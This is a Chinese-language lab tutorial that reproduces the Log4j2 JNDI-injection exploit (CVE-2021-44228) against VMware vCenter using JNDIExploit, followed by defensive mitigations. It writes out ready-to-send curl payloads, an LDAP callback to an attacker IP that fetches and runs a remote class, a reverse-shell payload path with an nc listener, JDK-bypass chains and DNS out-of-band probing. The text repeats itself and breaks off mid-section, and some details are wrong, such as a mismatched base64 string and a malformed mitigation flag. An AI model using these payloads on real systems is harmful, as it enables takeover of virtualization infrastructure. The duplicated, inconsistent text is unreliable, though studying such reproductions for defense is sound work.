1. 项目概述为什么我们要从攻击者视角看Log4j2如果你是一名安全工程师、运维人员或者对网络安全有浓厚兴趣的开发者那么“Log4j2漏洞”这个词在过去几年里绝对是你绕不开的梦魇或者说是一座金矿。这个编号为CVE-2021-44228的漏洞因其影响范围之广、利用方式之简单、危害程度之深被冠以“核弹级”漏洞的称号。但今天我们不打算再重复那些教科书式的漏洞原理科普。那些内容你在任何安全资讯网站都能找到。我想和你聊的是一种更贴近实战的视角攻击者视角。为什么是攻击者视角因为防御的本质是理解攻击。当你站在防御者的位置看着安全设备上密密麻麻的告警你可能会感到迷茫和疲惫。但如果你能清晰地知道攻击者是如何一步步撬开你的系统大门每一步用了什么工具、踩了什么点、遇到了什么阻碍那么你的防御策略将不再是盲人摸象而是有的放矢。这次我们选择的目标是VMware vCenter。作为企业虚拟化环境的核心大脑vCenter一旦失守意味着其管理的所有虚拟机、存储、网络都可能沦为攻击者的囊中之物。而Log4j2漏洞正是攻破这座堡垒的一把“万能钥匙”。我们将使用一个在实战和演练中极为流行的工具——JNDIExploit来完整地复现针对vCenter的漏洞利用过程。这不是一个简单的“一键攻击”演示而是一次深入的“外科手术式”剖析。我会带你理解JNDI注入的每一个环节从环境搭建、漏洞触发到利用链的构造和最终的命令执行。你会看到一个看似复杂的远程代码执行RCE漏洞其核心逻辑是如何被层层拆解并最终实现的。通过这次手把手的复现我希望你能获得的不只是“又一个漏洞的利用方法”而是一套分析、验证和防御此类JNDI注入漏洞的通用思维框架。当你下次再面对类似的漏洞预警时你将能更快地定位风险、验证影响、并制定出有效的缓解或修复方案。这才是从攻击者视角学习的真正价值。2. 核心漏洞原理与攻击链拆解在动手之前我们必须把地基打牢。Log4j2漏洞之所以可怕根源在于其默认开启的、强大的消息查找替换功能。很多人把它简单理解为“日志里不能出现${}”这其实只看到了表象。让我们深入它的骨髓看看攻击链是如何一环扣一环形成的。2.1 Log4j2的“超能力”Lookup机制Log4j2作为一个日志框架其设计初衷是好的。它提供了丰富的“Lookup”功能允许开发者在日志配置或日志消息中动态插入一些上下文信息。比如你可以用${java:runtime}来记录Java版本用${env:USER}来记录当前系统用户。这通过${prefix:name}这样的语法来实现其中prefix指定了查找的类型。问题出在其中一个名为jndi的Lookup上。JNDIJava Naming and Directory Interface是Java提供的一个统一接口用于访问各种命名和目录服务比如LDAP、RMI、DNS等。${jndi:ldap://evil.com/obj}这行代码的意思是“去evil.com这个LDAP服务器上查找名为obj的对象并把它加载过来。”在2021年12月之前Log4j2在默认配置下会无条件地解析并执行日志消息中的这些Lookup表达式即使这条日志消息来自用户不可信的输入。这就为灾难打开了大门。2.2 攻击链四部曲一次完整的JNDI注入攻击通常遵循以下四个步骤我们可以把它想象成一次“远程快递投递恶意包裹”的过程输入注入投递请求攻击者构造一个包含恶意JNDI Lookup字符串的Payload并将其注入到应用程序的某个输入点。这个输入点可以是HTTP请求头如User-Agent、X-Forwarded-For、请求参数、表单字段或者任何最终会被Log4j2记录到日志中的用户数据。对于vCenter其Web界面和API接口的许多用户输入点都可能成为入口。日志记录前台签收应用程序在处理请求时无意中将这个恶意字符串记录到了日志里使用的正是存在漏洞的Log4j2版本。此时Log4j2引擎开始解析这条日志消息。JNDI解析与远程加载拆包并按照指示操作当Log4j2解析到${jndi:ldap://attacker-ip:1389/BadClassName}时它不会将其视为普通字符串而是会真的发起一个JNDI查询去连接attacker-ip机器的1389端口LDAP服务默认端口请求获取BadClassName这个“对象”。恶意类执行包裹内的炸弹引爆攻击者控制的LDAP服务器并不会返回一个正常的对象而是返回一个重定向响应告诉Java“你要的BadClassName不在我这你去http://attacker-ip:8080/BadClassName.class这个HTTP地址下载吧。” Java的JNDI实现在特定版本和配置下会信任这个重定向从HTTP服务器下载并实例化这个.class文件。而这个BadClassName.class是攻击者预先编译好的恶意Java类其静态代码块或构造函数中包含了攻击者想要执行的任意命令如Runtime.getRuntime().exec(“calc”)或反弹Shell的命令。一旦类被加载代码随即执行攻击完成。关键点这个攻击链成功的关键除了Log4j2的漏洞本身还依赖于受害者Java环境的一个“特性”即默认情况下高版本Java8u191, 11.0.1等虽然对从远程LDAP服务加载工厂类增加了限制但对于“LDAP服务返回一个Codebase地址让客户端去HTTP服务下载类”这种行为在某些条件下依然可能成功。而JNDIExploit这类工具正是精心构造了这些条件。2.3 为什么是vCenterVMware vCenter Server是构建和管理VMware vSphere虚拟化环境的核心管理平台。它本身是一个复杂的Java应用程序。在漏洞爆发初期VMware迅速发布安全公告确认了vCenter多个版本受Log4j2漏洞影响。由于其战略地位它成为了攻击者垂涎的首要目标。成功利用该漏洞攻击者可以直接在vCenter Server所在的操作系统上执行命令从而完全掌控整个虚拟化基础设施。3. 实验环境搭建与工具准备“工欲善其事必先利其器。” 在开始复现之前我们需要一个安全、隔离的实验环境。请务必在虚拟机或专属的隔离网络中进行本实验切勿在任何生产或公共网络环境尝试。3.1 靶机环境部署有漏洞的vCenter为了复现我们需要一个存在漏洞的vCenter实例。有几种选择官方OVA模板推荐VMware为开发者提供了预构建的vCenter Server Appliance (VCSA)的OVA模板你可以下载特定版本如7.0 U3c之前的版本并在VMware Workstation或ESXi中导入。这是最接近真实环境的方式。漏洞靶场一些在线或离线的漏洞演练平台如Vulhub、VulnHub可能提供了vCenter的漏洞场景但通常不是完整版。自行编译/搭建对于极度硬核的研究者可以尝试从源码构建一个包含漏洞组件的简化环境但这过程复杂。这里我们以在VMware Workstation中导入VCSA 7.0 U2的OVA为例下载从VMware官网获取VCSA 7.0 U2的ISO镜像。你需要注册一个账户。部署使用VMware Workstation的“文件”-“打开”选择你下载的VCSA的OVA文件。按照向导设置虚拟机名称和存储路径。关键一步是将虚拟机的网络模式设置为“主机模式”或“自定义的仅主机模式网络”确保其与你的攻击机Kali Linux在同一封闭网络内且无法访问外网。初始化启动虚拟机等待系统启动。通过控制台或分配的IP地址在主机模式网络中你需要手动配置或查看DHCP分配访问vCenter的5480端口进行初始化设置设置root密码、配置SSO域等。这个过程可能需要较长时间。重要注意事项实验用的vCenter虚拟机应分配足够资源至少8GB内存2核CPU。初始化完成后记下其IP地址我们后续将用它作为攻击目标。3.2 攻击机环境Kali Linux与工具集攻击机我们选择Kali Linux它集成了大量安全工具。你需要准备以下关键组件Java环境JNDIExploit是一个Java工具需要JDK来运行。同时为了兼容性我们可能需要一个特定版本的JDK来启动恶意HTTP服务。建议安装OpenJDK 8或11。sudo apt update sudo apt install openjdk-11-jdk -y java -version下载JNDIExploit从GitHub例如来自feihong-cs或welk1n的仓库获取JNDIExploit的JAR包。这是一个功能强大的JNDI注入利用工具集成了LDAP和HTTP服务。wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip unzip JNDIExploit.v1.4.zip工具选择考量为什么是JNDIExploit而不是其他因为它高度集成一个工具同时提供了恶意LDAP服务器、HTTP文件服务器以及多种Payload生成功能极大简化了利用步骤。它支持多种绕过方式和高版本JDK的利用是实战和演练中的“瑞士军刀”。网络探测工具确保能连通靶机。# 在攻击机上探测vCenter的IP和开放端口 ping vCenter-IP nmap -sV -p 443,80,22 vCenter-IP正常情况下你应该能看到443端口HTTPS管理界面开放。3.3 环境连通性验证在启动攻击前必须确保攻击机Kali和靶机vCenter之间的网络是通的并且靶机无法访问互联网。这是安全实验的底线防止你的恶意Payload意外流出。在Kali上尝试访问vCenter的HTTPS界面https://vCenter-IP。你应该能看到vCenter的登录页面。在vCenter虚拟机内尝试ping一个外网地址如8.8.8.8应该是不通的。如果通请检查你的虚拟机网络设置务必使用主机模式或一个无NAT、无网关的仅主机网络。4. 手把手利用JNDIExploit进行漏洞复现环境就绪现在让我们扮演攻击者发起一次完整的攻击。我们的目标是通过Log4j2漏洞在vCenter服务器上执行一条命令例如在/tmp目录下创建一个名为hacked_by_log4j.txt的文件作为攻击成功的证明。4.1 第一步启动JNDIExploit服务JNDIExploit将扮演攻击者的恶意LDAP和HTTP服务器。切换到JNDIExploit的目录使用以下命令启动它java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 攻击机IP -p LDAP服务端口例如如果你的Kali IP是192.168.111.128你可以使用默认的LDAP端口1389java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.128 -p 1389参数解读-i指定攻击者即本机的IP地址vCenter需要能访问到这个地址。-p指定LDAP服务监听的端口默认为1389。启动成功后你会看到控制台输出类似以下信息表明LDAP服务1389端口和HTTP文件服务8180端口已就绪[] LDAP Server Start Listening on 1389... [] HTTP Server Start Listening on 8180...这个工具现在在后台做了两件事1. 监听1389端口等待vCenter发来的JNDI查询。2. 监听8180端口准备提供恶意的.class文件下载。4.2 第二步构造并发送漏洞触发Payload现在我们需要找到一个vCenter的入口点将我们的恶意JNDI字符串注入进去。vCenter有多个可能记录日志的接口一个常见且易于测试的点是登录接口。因为登录动作无论成功与否通常都会被详细记录。我们构造一个特殊的登录请求在HTTP请求头中插入Payload。这里我们选择X-Forwarded-For这个常用于记录客户端IP的请求头。使用curl命令来发送这个请求curl -k -v https://vCenter-IP/ui/login \ -H “X-Forwarded-For: \${jndi:ldap://攻击机IP:1389/Basic/Command/Base64/Base64编码的命令}”Payload构造详解\${jndi:ldap://...}这是触发漏洞的核心。开头的反斜杠\有时是为了应对可能的转义处理但很多情况下直接使用${也可以。我们这里保留它。攻击机IP:1389指向我们刚刚启动的JNDIExploit服务的LDAP端口。/Basic/Command/Base64/...这是JNDIExploit定义的一种URL路径格式。它告诉JNDIExploit“这是一个基础的命令执行Payload命令已经用Base64编码了。” JNDIExploit会根据这个路径动态生成一个对应的恶意Java类。Base64编码的命令我们需要执行的系统命令先进行Base64编码。例如我们想在Linux系统的vCenter上创建文件命令是touch /tmp/hacked_by_log4j.txt。echo -n “touch /tmp/hacked_by_log4j.txt” | base64 # 输出dG91Y2ggL3RtcC9oYWNrZWRfYnlfTG9nNGoudHh0Cg将编码后的字符串替换到Payload中完整的curl命令如下curl -k -v https://192.168.111.100/ui/login \ -H “X-Forwarded-For: \${jndi:ldap://192.168.111.128:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9oYWNrZWRfYnlfTG9nNGoudHh0Cg}”-k忽略SSL证书验证因为vCenter使用自签名证书。-v显示详细输出便于观察请求和响应过程。4.3 第三步观察攻击链触发与命令执行当你执行上述curl命令后立即切换到运行JNDIExploit的终端窗口。如果漏洞存在且环境配置正确你将看到一系列实时的日志输出清晰地展示了攻击链的每一步收到JNDI查询首先JNDIExploit的LDAP服务会收到来自vCenter的查询。[] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9oYWNrZWRfYnlfTG9nNGoudHh0Cg这表示vCenter的Log4j2已经解析了我们的Payload并向我们的攻击机发起了LDAP查询请求Basic/Command/Base64/...这个“对象”。返回LDAP重定向响应JNDIExploit不会直接返回类数据而是返回一个JNDI引用Reference指向一个HTTP地址。[] Send LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9oYWNrZWRfYnlfTG9jNGoudHh0Cg with basic remote reference payload.这个引用告诉vCenter的Java环境“你要的类在这里http://192.168.111.128:8180/ExploitXXXXXX.class”。收到HTTP类文件请求紧接着vCenter的Java环境会根据引用地址向JNDIExploit的HTTP服务8180端口发起请求下载恶意类文件。[] HTTP Server Receive Request: /ExploitXXXXXX.class [] Payload class file: ExploitXXXXXX.class delivered.命令执行一旦恶意类被加载并实例化其静态代码块中的命令就会执行。在JNDIExploit的日志中你可能会看到Command executed或类似的提示。此时命令touch /tmp/hacked_by_log4j.txt已经在vCenter服务器上执行了。4.4 第四步验证攻击结果攻击是否真正成功需要到vCenter服务器上去验证。由于我们通常没有直接登录vCenter操作系统的权限可以通过其他方式间接验证或者如果实验环境允许可以直接登录vCenter的ShellVCSA基于Photon OS可以通过控制台或SSH登录前提是你知道root密码。登录到vCenter服务器检查/tmp目录ls -la /tmp/hacked_by_log4j.txt如果文件被成功创建那么恭喜你一次完整的远程代码执行攻击就复现成功了。这证明该vCenter实例确实存在Log4j2漏洞并且可以被外部利用。5. 深度技术细节与高级利用手法基础的命令执行成功了但这只是开始。一个成熟的攻击者会追求更隐蔽、更持久的控制。JNDIExploit提供了丰富的Payload类型我们来深入看看其中的门道。5.1 Payload类型详解在JNDIExploit的路径中我们使用了/Basic/Command/Base64/。它支持多种模式/Basic/Command/Base64/[base64_cmd]最直接的命令执行。将Base64编码的系统命令写入一个临时脚本文件并执行。适用于Linux/Unix系统。/Basic/Command/[raw_cmd]直接执行原始命令需进行URL编码。但包含特殊字符时容易出错Base64更稳定。/ReverseShell/[attack_ip]/[port]反弹Shell。这是更高级的利用方式。它会让目标服务器主动连接攻击机指定的IP和端口从而获得一个交互式的命令行Shell。例如${jndi:ldap://192.168.111.128:1389/ReverseShell/192.168.111.128/4444}。攻击机需要先用nc -lvp 4444监听4444端口。/TomcatBypass/...针对运行在Tomcat等特定容器环境下由于类加载器隔离导致无法直接加载恶意类的情况提供了绕过方式。/GroovyBypass/...利用Groovy脚本引擎执行命令适用于高版本JDK对JNDI注入的某些限制。/WeblogicBypass/...针对WebLogic中间件环境的特殊利用链。选择Payload的策略内网探测先用/Basic/Command/Base64/执行ping或curl命令探测内网其他主机。获取立足点使用/ReverseShell/获取一个稳定的交互式Shell方便后续操作。环境适配如果基础命令执行成功但反弹Shell失败可能是目标环境网络出站受限或者nc命令不存在。此时可以尝试先上传一个nc二进制文件或者使用其他脚本语言如Python、Perl的反弹Shell命令。5.2 绕过JDK高版本限制从JDK 8u191、11.0.1等版本开始Oracle增加了com.sun.jndi.ldap.object.trustURLCodebase系统属性默认设置为false这阻止了JNDI从远程Codebase即我们的HTTP服务器加载工厂类直接扼杀了经典的利用链。但这并非绝对安全。JNDIExploit集成了一些绕过技巧利用本地ClassPath中的类如果目标ClassPath中存在某些具有危险方法的类如org.apache.naming.factory.BeanFactory配合javax.el.ELProcessor攻击者可以通过LDAP引用指向这些已有的类并传递恶意参数同样可以达到代码执行的效果。这需要目标应用依赖了特定的第三方库。利用其他Lookup/协议Log4j2除了jndi还有其他Lookup如ctx、main、sys等。虽然它们不如JNDI直接但在某些特定上下文或与其他漏洞结合时可能有用。JNDIExploit主要专注于JNDI利用链。在实际攻击中攻击者会先探测目标Java版本然后选择合适的Payload路径。对于vCenter其内置的JDK版本通常是固定的需要根据VMware官方公告确认其受影响的JDK版本范围。5.3 漏洞探测与指纹识别在真正的攻击中攻击者不会盲目发送攻击Payload。他们会先进行探测确认目标是否存在漏洞以及可能的环境信息。DNS外带探测这是最安全、最隐蔽的探测方式。Payload使用${jndi:dns://dnslog.cn/xxx}。如果目标存在漏洞它会向dnslog.cn这样的DNS日志平台发起一次DNS查询攻击者只需查看该平台是否有自己子域名的查询记录即可确认漏洞而不会触发命令执行。JNDIExploit也支持启动一个DNS服务来接收这种探测。延时盲测构造Payload执行sleep 5这样的命令通过观察响应时间是否延迟来判断。错误信息判断向不存在的LDAP服务器发送请求观察应用是否返回与JNDI连接相关的错误信息如“Connection refused”这也能间接提示漏洞存在。6. 防御视角从复现中学到的防护要点通过这次完整的攻击复现我们站在攻击者的角度摸清了整个流程。现在切换回防御者视角这些知识能直接转化为有效的防御策略紧急缓解措施立竿见影设置系统属性在Java应用的启动参数中添加-Dlog4j2.formatMsgNoLookupstrueLog4j 2.10及以上或-Dlog4j2.formatMsgNoLookupstrue。这是漏洞爆发初期最快速的全局缓解方案。移除漏洞类直接删除Log4j-core JAR包中的JndiLookup类文件。这是最彻底的方法但可能影响某些依赖该类的功能。zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class网络层控制在防火墙或主机安全策略上严格限制服务器出站连接。禁止内部服务器主动向外部未知地址的LDAP389, 636, 1389等、RMI1099、HTTP/HTTPS等端口发起连接。这是阻断攻击链第3、4步的最有效手段之一。根本解决方案升级升级升级将Log4j2组件升级到安全版本2.17.0及以上截至我知识截止日期2.17.1是推荐版本。这是唯一一劳永逸的方法。对于vCenter必须严格按照VMware官方发布的安全公告和升级指南进行操作。供应链安全扫描在CI/CD流程中引入SCA软件成分分析工具持续扫描项目依赖及时发现并告警存在已知漏洞的组件。纵深防御与监控WAF/IPS规则部署Web应用防火墙或入侵防御系统配置规则以拦截包含${jndi:、${ctx:、${sys:等模式的请求。但要注意攻击者可能会使用各种转义、编码如URL编码、Base64编码进行绕过。主机安全监控在服务器上部署HIDS主机入侵检测系统监控异常进程创建如突然启动bash、sh、powershell、可疑网络外连尤其是向非常用端口的连接以及敏感目录的文件创建如/tmp下新增可执行文件。日志审计与分析集中收集和分析应用日志、系统日志。搜索日志中是否出现了异常的JNDI字符串模式。虽然攻击成功意味着日志可能已被记录但及时的日志分析有助于发现攻击尝试和追溯攻击源头。安全开发规范输入验证与过滤对所有用户输入进行严格的验证和过滤特别是在记录日志之前。但这种方式容易遗漏不应作为主要防御手段。最小权限原则运行Java应用的账户应遵循最小权限原则避免使用root或高权限账户。这样即使被攻破攻击者能造成的破坏也有限。复现漏洞的意义绝不止于“炫技”。它是一次深刻的攻防演练。当你亲手走通攻击者的每一步你才能真正理解防御阵地的每一个薄弱点应该加固在哪里。对于Log4j2这样的“史诗级”漏洞修复和防御是一个系统工程需要从开发、部署、运维到监控的全流程参与。希望这次从攻击者视角出发的旅程能让你在构建更安全系统的道路上又多了一份笃定和清晰。
从攻击者视角复现Log4j2漏洞:JNDI注入原理与VMware vCenter实战利用
1. 项目概述为什么我们要从攻击者视角看Log4j2如果你是一名安全工程师、运维人员或者对网络安全有浓厚兴趣的开发者那么“Log4j2漏洞”这个词在过去几年里绝对是你绕不开的梦魇或者说是一座金矿。这个编号为CVE-2021-44228的漏洞因其影响范围之广、利用方式之简单、危害程度之深被冠以“核弹级”漏洞的称号。但今天我们不打算再重复那些教科书式的漏洞原理科普。那些内容你在任何安全资讯网站都能找到。我想和你聊的是一种更贴近实战的视角攻击者视角。为什么是攻击者视角因为防御的本质是理解攻击。当你站在防御者的位置看着安全设备上密密麻麻的告警你可能会感到迷茫和疲惫。但如果你能清晰地知道攻击者是如何一步步撬开你的系统大门每一步用了什么工具、踩了什么点、遇到了什么阻碍那么你的防御策略将不再是盲人摸象而是有的放矢。这次我们选择的目标是VMware vCenter。作为企业虚拟化环境的核心大脑vCenter一旦失守意味着其管理的所有虚拟机、存储、网络都可能沦为攻击者的囊中之物。而Log4j2漏洞正是攻破这座堡垒的一把“万能钥匙”。我们将使用一个在实战和演练中极为流行的工具——JNDIExploit来完整地复现针对vCenter的漏洞利用过程。这不是一个简单的“一键攻击”演示而是一次深入的“外科手术式”剖析。我会带你理解JNDI注入的每一个环节从环境搭建、漏洞触发到利用链的构造和最终的命令执行。你会看到一个看似复杂的远程代码执行RCE漏洞其核心逻辑是如何被层层拆解并最终实现的。通过这次手把手的复现我希望你能获得的不只是“又一个漏洞的利用方法”而是一套分析、验证和防御此类JNDI注入漏洞的通用思维框架。当你下次再面对类似的漏洞预警时你将能更快地定位风险、验证影响、并制定出有效的缓解或修复方案。这才是从攻击者视角学习的真正价值。2. 核心漏洞原理与攻击链拆解在动手之前我们必须把地基打牢。Log4j2漏洞之所以可怕根源在于其默认开启的、强大的消息查找替换功能。很多人把它简单理解为“日志里不能出现${}”这其实只看到了表象。让我们深入它的骨髓看看攻击链是如何一环扣一环形成的。2.1 Log4j2的“超能力”Lookup机制Log4j2作为一个日志框架其设计初衷是好的。它提供了丰富的“Lookup”功能允许开发者在日志配置或日志消息中动态插入一些上下文信息。比如你可以用${java:runtime}来记录Java版本用${env:USER}来记录当前系统用户。这通过${prefix:name}这样的语法来实现其中prefix指定了查找的类型。问题出在其中一个名为jndi的Lookup上。JNDIJava Naming and Directory Interface是Java提供的一个统一接口用于访问各种命名和目录服务比如LDAP、RMI、DNS等。${jndi:ldap://evil.com/obj}这行代码的意思是“去evil.com这个LDAP服务器上查找名为obj的对象并把它加载过来。”在2021年12月之前Log4j2在默认配置下会无条件地解析并执行日志消息中的这些Lookup表达式即使这条日志消息来自用户不可信的输入。这就为灾难打开了大门。2.2 攻击链四部曲一次完整的JNDI注入攻击通常遵循以下四个步骤我们可以把它想象成一次“远程快递投递恶意包裹”的过程输入注入投递请求攻击者构造一个包含恶意JNDI Lookup字符串的Payload并将其注入到应用程序的某个输入点。这个输入点可以是HTTP请求头如User-Agent、X-Forwarded-For、请求参数、表单字段或者任何最终会被Log4j2记录到日志中的用户数据。对于vCenter其Web界面和API接口的许多用户输入点都可能成为入口。日志记录前台签收应用程序在处理请求时无意中将这个恶意字符串记录到了日志里使用的正是存在漏洞的Log4j2版本。此时Log4j2引擎开始解析这条日志消息。JNDI解析与远程加载拆包并按照指示操作当Log4j2解析到${jndi:ldap://attacker-ip:1389/BadClassName}时它不会将其视为普通字符串而是会真的发起一个JNDI查询去连接attacker-ip机器的1389端口LDAP服务默认端口请求获取BadClassName这个“对象”。恶意类执行包裹内的炸弹引爆攻击者控制的LDAP服务器并不会返回一个正常的对象而是返回一个重定向响应告诉Java“你要的BadClassName不在我这你去http://attacker-ip:8080/BadClassName.class这个HTTP地址下载吧。” Java的JNDI实现在特定版本和配置下会信任这个重定向从HTTP服务器下载并实例化这个.class文件。而这个BadClassName.class是攻击者预先编译好的恶意Java类其静态代码块或构造函数中包含了攻击者想要执行的任意命令如Runtime.getRuntime().exec(“calc”)或反弹Shell的命令。一旦类被加载代码随即执行攻击完成。关键点这个攻击链成功的关键除了Log4j2的漏洞本身还依赖于受害者Java环境的一个“特性”即默认情况下高版本Java8u191, 11.0.1等虽然对从远程LDAP服务加载工厂类增加了限制但对于“LDAP服务返回一个Codebase地址让客户端去HTTP服务下载类”这种行为在某些条件下依然可能成功。而JNDIExploit这类工具正是精心构造了这些条件。2.3 为什么是vCenterVMware vCenter Server是构建和管理VMware vSphere虚拟化环境的核心管理平台。它本身是一个复杂的Java应用程序。在漏洞爆发初期VMware迅速发布安全公告确认了vCenter多个版本受Log4j2漏洞影响。由于其战略地位它成为了攻击者垂涎的首要目标。成功利用该漏洞攻击者可以直接在vCenter Server所在的操作系统上执行命令从而完全掌控整个虚拟化基础设施。3. 实验环境搭建与工具准备“工欲善其事必先利其器。” 在开始复现之前我们需要一个安全、隔离的实验环境。请务必在虚拟机或专属的隔离网络中进行本实验切勿在任何生产或公共网络环境尝试。3.1 靶机环境部署有漏洞的vCenter为了复现我们需要一个存在漏洞的vCenter实例。有几种选择官方OVA模板推荐VMware为开发者提供了预构建的vCenter Server Appliance (VCSA)的OVA模板你可以下载特定版本如7.0 U3c之前的版本并在VMware Workstation或ESXi中导入。这是最接近真实环境的方式。漏洞靶场一些在线或离线的漏洞演练平台如Vulhub、VulnHub可能提供了vCenter的漏洞场景但通常不是完整版。自行编译/搭建对于极度硬核的研究者可以尝试从源码构建一个包含漏洞组件的简化环境但这过程复杂。这里我们以在VMware Workstation中导入VCSA 7.0 U2的OVA为例下载从VMware官网获取VCSA 7.0 U2的ISO镜像。你需要注册一个账户。部署使用VMware Workstation的“文件”-“打开”选择你下载的VCSA的OVA文件。按照向导设置虚拟机名称和存储路径。关键一步是将虚拟机的网络模式设置为“主机模式”或“自定义的仅主机模式网络”确保其与你的攻击机Kali Linux在同一封闭网络内且无法访问外网。初始化启动虚拟机等待系统启动。通过控制台或分配的IP地址在主机模式网络中你需要手动配置或查看DHCP分配访问vCenter的5480端口进行初始化设置设置root密码、配置SSO域等。这个过程可能需要较长时间。重要注意事项实验用的vCenter虚拟机应分配足够资源至少8GB内存2核CPU。初始化完成后记下其IP地址我们后续将用它作为攻击目标。3.2 攻击机环境Kali Linux与工具集攻击机我们选择Kali Linux它集成了大量安全工具。你需要准备以下关键组件Java环境JNDIExploit是一个Java工具需要JDK来运行。同时为了兼容性我们可能需要一个特定版本的JDK来启动恶意HTTP服务。建议安装OpenJDK 8或11。sudo apt update sudo apt install openjdk-11-jdk -y java -version下载JNDIExploit从GitHub例如来自feihong-cs或welk1n的仓库获取JNDIExploit的JAR包。这是一个功能强大的JNDI注入利用工具集成了LDAP和HTTP服务。wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip unzip JNDIExploit.v1.4.zip工具选择考量为什么是JNDIExploit而不是其他因为它高度集成一个工具同时提供了恶意LDAP服务器、HTTP文件服务器以及多种Payload生成功能极大简化了利用步骤。它支持多种绕过方式和高版本JDK的利用是实战和演练中的“瑞士军刀”。网络探测工具确保能连通靶机。# 在攻击机上探测vCenter的IP和开放端口 ping vCenter-IP nmap -sV -p 443,80,22 vCenter-IP正常情况下你应该能看到443端口HTTPS管理界面开放。3.3 环境连通性验证在启动攻击前必须确保攻击机Kali和靶机vCenter之间的网络是通的并且靶机无法访问互联网。这是安全实验的底线防止你的恶意Payload意外流出。在Kali上尝试访问vCenter的HTTPS界面https://vCenter-IP。你应该能看到vCenter的登录页面。在vCenter虚拟机内尝试ping一个外网地址如8.8.8.8应该是不通的。如果通请检查你的虚拟机网络设置务必使用主机模式或一个无NAT、无网关的仅主机网络。4. 手把手利用JNDIExploit进行漏洞复现环境就绪现在让我们扮演攻击者发起一次完整的攻击。我们的目标是通过Log4j2漏洞在vCenter服务器上执行一条命令例如在/tmp目录下创建一个名为hacked_by_log4j.txt的文件作为攻击成功的证明。4.1 第一步启动JNDIExploit服务JNDIExploit将扮演攻击者的恶意LDAP和HTTP服务器。切换到JNDIExploit的目录使用以下命令启动它java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 攻击机IP -p LDAP服务端口例如如果你的Kali IP是192.168.111.128你可以使用默认的LDAP端口1389java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.128 -p 1389参数解读-i指定攻击者即本机的IP地址vCenter需要能访问到这个地址。-p指定LDAP服务监听的端口默认为1389。启动成功后你会看到控制台输出类似以下信息表明LDAP服务1389端口和HTTP文件服务8180端口已就绪[] LDAP Server Start Listening on 1389... [] HTTP Server Start Listening on 8180...这个工具现在在后台做了两件事1. 监听1389端口等待vCenter发来的JNDI查询。2. 监听8180端口准备提供恶意的.class文件下载。4.2 第二步构造并发送漏洞触发Payload现在我们需要找到一个vCenter的入口点将我们的恶意JNDI字符串注入进去。vCenter有多个可能记录日志的接口一个常见且易于测试的点是登录接口。因为登录动作无论成功与否通常都会被详细记录。我们构造一个特殊的登录请求在HTTP请求头中插入Payload。这里我们选择X-Forwarded-For这个常用于记录客户端IP的请求头。使用curl命令来发送这个请求curl -k -v https://vCenter-IP/ui/login \ -H “X-Forwarded-For: \${jndi:ldap://攻击机IP:1389/Basic/Command/Base64/Base64编码的命令}”Payload构造详解\${jndi:ldap://...}这是触发漏洞的核心。开头的反斜杠\有时是为了应对可能的转义处理但很多情况下直接使用${也可以。我们这里保留它。攻击机IP:1389指向我们刚刚启动的JNDIExploit服务的LDAP端口。/Basic/Command/Base64/...这是JNDIExploit定义的一种URL路径格式。它告诉JNDIExploit“这是一个基础的命令执行Payload命令已经用Base64编码了。” JNDIExploit会根据这个路径动态生成一个对应的恶意Java类。Base64编码的命令我们需要执行的系统命令先进行Base64编码。例如我们想在Linux系统的vCenter上创建文件命令是touch /tmp/hacked_by_log4j.txt。echo -n “touch /tmp/hacked_by_log4j.txt” | base64 # 输出dG91Y2ggL3RtcC9oYWNrZWRfYnlfTG9nNGoudHh0Cg将编码后的字符串替换到Payload中完整的curl命令如下curl -k -v https://192.168.111.100/ui/login \ -H “X-Forwarded-For: \${jndi:ldap://192.168.111.128:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9oYWNrZWRfYnlfTG9nNGoudHh0Cg}”-k忽略SSL证书验证因为vCenter使用自签名证书。-v显示详细输出便于观察请求和响应过程。4.3 第三步观察攻击链触发与命令执行当你执行上述curl命令后立即切换到运行JNDIExploit的终端窗口。如果漏洞存在且环境配置正确你将看到一系列实时的日志输出清晰地展示了攻击链的每一步收到JNDI查询首先JNDIExploit的LDAP服务会收到来自vCenter的查询。[] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9oYWNrZWRfYnlfTG9nNGoudHh0Cg这表示vCenter的Log4j2已经解析了我们的Payload并向我们的攻击机发起了LDAP查询请求Basic/Command/Base64/...这个“对象”。返回LDAP重定向响应JNDIExploit不会直接返回类数据而是返回一个JNDI引用Reference指向一个HTTP地址。[] Send LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9oYWNrZWRfYnlfTG9jNGoudHh0Cg with basic remote reference payload.这个引用告诉vCenter的Java环境“你要的类在这里http://192.168.111.128:8180/ExploitXXXXXX.class”。收到HTTP类文件请求紧接着vCenter的Java环境会根据引用地址向JNDIExploit的HTTP服务8180端口发起请求下载恶意类文件。[] HTTP Server Receive Request: /ExploitXXXXXX.class [] Payload class file: ExploitXXXXXX.class delivered.命令执行一旦恶意类被加载并实例化其静态代码块中的命令就会执行。在JNDIExploit的日志中你可能会看到Command executed或类似的提示。此时命令touch /tmp/hacked_by_log4j.txt已经在vCenter服务器上执行了。4.4 第四步验证攻击结果攻击是否真正成功需要到vCenter服务器上去验证。由于我们通常没有直接登录vCenter操作系统的权限可以通过其他方式间接验证或者如果实验环境允许可以直接登录vCenter的ShellVCSA基于Photon OS可以通过控制台或SSH登录前提是你知道root密码。登录到vCenter服务器检查/tmp目录ls -la /tmp/hacked_by_log4j.txt如果文件被成功创建那么恭喜你一次完整的远程代码执行攻击就复现成功了。这证明该vCenter实例确实存在Log4j2漏洞并且可以被外部利用。5. 深度技术细节与高级利用手法基础的命令执行成功了但这只是开始。一个成熟的攻击者会追求更隐蔽、更持久的控制。JNDIExploit提供了丰富的Payload类型我们来深入看看其中的门道。5.1 